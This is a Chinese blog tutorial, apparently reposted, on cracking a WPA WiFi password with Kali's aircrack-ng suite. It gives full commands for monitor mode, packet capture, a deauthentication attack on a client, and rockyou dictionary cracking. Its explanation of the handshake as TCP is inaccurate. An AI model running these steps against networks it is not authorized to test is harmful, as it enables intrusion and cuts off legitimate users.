kali WiFi密码破解分享

安装kali:

这里就不介绍如何安装kali了,跟着网上教程安装就行
这里推荐推荐:

https://blog.csdn.net/weixin_41247970/article/details/104118700

使用工具:

这是我使用的网卡:RT3070

在这里插入图片描述

开始主题:

  • 切换到root模式:
su root

在这里插入图片描述

看见root后面的骷髅头没(请合理使用技术)
这里说一下输入密码是看不见的(就是不显示密码)

  • 查看无线网卡:
airmon-ng

在这里插入图片描述

可以看到显示wlan0 ,这就是我的网卡

  • 开启网卡的监听模式
airmon-ng start wlan0

在这里插入图片描述

  • 其他网卡处于监听状态,需要先将其关闭
airmon-ng check kill

在这里插入图片描述

  • 再次查看网卡:
airmon-ng

在这里插入图片描述

会发现waln0变成wlan0mon

  • 扫描附近的wifi信号:
airodump-ng wlan0mon

在这里插入图片描述

BSSID为wifi的MAC地址,PWR为信号强弱程度,数值越小信号越强;#DATA为数据量,越大使用的人就越多,CH为信道频率(频道),ESSID为wifi的名称,中文可能会有乱码

我将破解名称为shujin(这个是我自己的WiFi)的这个wifi,也就是第一个wifi
Ctrl+c(停止)

  • 抓取wifi数据包并保存:
airodump-ng -c 1 --bssid 36:13:E8:74:F8:83 -w ~/wifi/test wlan0mon

在这里插入图片描述

  • 攻击获取WPA hankshake:
aireplay-ng -<攻击模式,这里使用持续攻击(0)> [攻击次数,0为无限攻击] -a <AP端的MAC地址> -c <被攻击设备的MAC地址> <interface名称>
aireplay-ng -0 10 -a 36:13:E8:74:F8:83 -c 10:32:7E:01:67:F8 wlan0mon

攻击原理是:先让设备掉线,设备会再自动连接,并发这个自动连接过程会进行三次握手,会发送tcp包,我方伪装成WiFi热点去窃取该数据包。我方窃取后即可用字典穷举法暴力破解加密的WiFi密码,数据包里面的密码是哈希加密的,哈希加密只能正向

在这里插入图片描述

  • 查看被攻击的用户是否重新连接wifi:
airodump-ng -c 1 --bssid 36:13:E8:74:F8:83 -w ~/wifi/test wlan0mon

在这里插入图片描述

会出现**WPA handshake:**表示成功

  • 使用字典破解:

kali有自带的字典需要解压(rockyou.txt.gz
在这里插入图片描述

  • 输入命令:

注意查看上面保存的地址
在这里插入图片描述

aircrack-ng -w /usr/share/wordlists/rockyou.txt ~/wifi/test-06.cap

在这里插入图片描述

  • 答案

在这里插入图片描述

结束:

这个不是万能的,你必须有强大的字典,强密码就很难破解(有一些还破解不了,得使用其他技术)

猜你喜欢

转载自blog.csdn.net/weixin_51309151/article/details/122878504